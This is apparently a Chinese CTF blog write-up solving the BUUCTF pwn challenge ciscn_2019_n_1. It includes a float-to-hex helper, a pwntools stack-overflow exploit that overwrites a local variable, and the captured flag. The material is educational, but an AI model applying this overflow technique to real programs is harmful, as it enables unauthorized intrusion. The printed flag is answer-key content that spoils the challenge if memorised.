pwn学习(4)BUUCTF-ciscn_2019_n_1(浮点数转十六进制脚本积累)

checksec一下

IDA打开,如果满足的条件达成,就可以get flag

找到栈溢出漏洞,输入可以覆盖到v2

将代码11.28125在内存中的十六进制表示出来,

浮点数转十六进制代码如下:

复制代码
import struct

def float_to_hex(f):
    return hex(struct.unpack('<I',struct.pack('<f',f))[0])
print(float_to_hex(11.28125))
#output(0x41348000)

exp:

复制代码
from pwn import *

p=remote('node4.buuoj.cn',25860)

payload=b'a'*(0x30-0x4)+p32(0x41348000)
p.sendline(payload)

p.interactive()

运行出来的结果:

flag{8a5e8279-51a2-4b3b-8959-4d3f9b19227f}
总结:

脚本积累:浮点数转十六进制代码

相关推荐
kblj555522 分钟前
学习Linux——网络基础管理
linux·网络·学习
天狗下凡23 分钟前
【OpenGL学习】第1课: 概念与流程理解
学习
黑岚樱梦26 分钟前
计算机网络第六章学习
学习·计算机网络
c0d1ng28 分钟前
自建督学习——BERT(第二十二周周报)
人工智能·学习·bert
木霖森7729 分钟前
软件工程入门学习
学习·软件工程
BullSmall1 小时前
《道德经》第五十章
学习
Larry_Yanan2 小时前
QML学习笔记(五十三)QML与C++交互:数据转换——序列类型与 JavaScript 数组的转换
c++·笔记·学习
snakecy2 小时前
cuda10 cudnn7.5--旧版本
python·学习
2301_796512523 小时前
Rust编程学习 - 自动解引用的用处,如何进行“解引用”(Deref) 是“取引用”(Ref) 的反操作
开发语言·学习·rust
张永清-老清3 小时前
每周读书与学习->JMeter主要元件详细介绍(四)再谈取样器
学习·jmeter·性能优化·性能调优·jmeter性能测试·性能分析·每周读书与学习